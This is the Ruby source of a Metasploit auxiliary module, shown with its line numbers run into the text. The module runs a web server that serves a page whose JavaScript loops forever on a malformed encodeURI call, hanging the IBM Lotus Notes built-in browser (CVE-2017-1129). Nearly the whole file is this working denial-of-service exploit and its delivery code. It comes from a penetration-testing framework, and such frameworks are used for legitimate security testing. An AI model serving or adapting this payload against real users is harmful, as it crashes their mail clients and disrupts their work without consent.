Path: blob/master/modules/auxiliary/dos/http/ibm_lotus_notes.rb
21552 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpServer78def initialize(info = {})9super(10update_info(11info,12'Name' => 'IBM Notes encodeURI DOS',13'Description' => %q{14This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.15If successful, it could cause the Notes client to hang and have to be restarted.16},17'License' => MSF_LICENSE,18'Author' => [19'Dhiraj Mishra',20],21'References' => [22[ 'EDB', '42602'],23[ 'CVE', '2017-1129' ],24[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ]25],26'DisclosureDate' => '2017-08-31',27'Actions' => [[ 'WebServer', { 'Description' => 'Serve exploit via web server' } ]],28'PassiveActions' => [ 'WebServer' ],29'DefaultAction' => 'WebServer',30'Notes' => {31'Stability' => [CRASH_SERVICE_DOWN],32'SideEffects' => [],33'Reliability' => []34}35)36)37end3839def run40exploit # start http server41end4243def setup44@html = %|45<html><head><title>DOS</title>46<script type="text/javascript">47while (true) try {48var object = { };49function d(d0) {50var d0 = (object instanceof encodeURI)('foo');51}52d(75);53} catch (d) { }54</script>55</head></html>56|57end5859def on_request_uri(cli, _request)60print_status('Sending response')61send_response(cli, @html)62end63end646566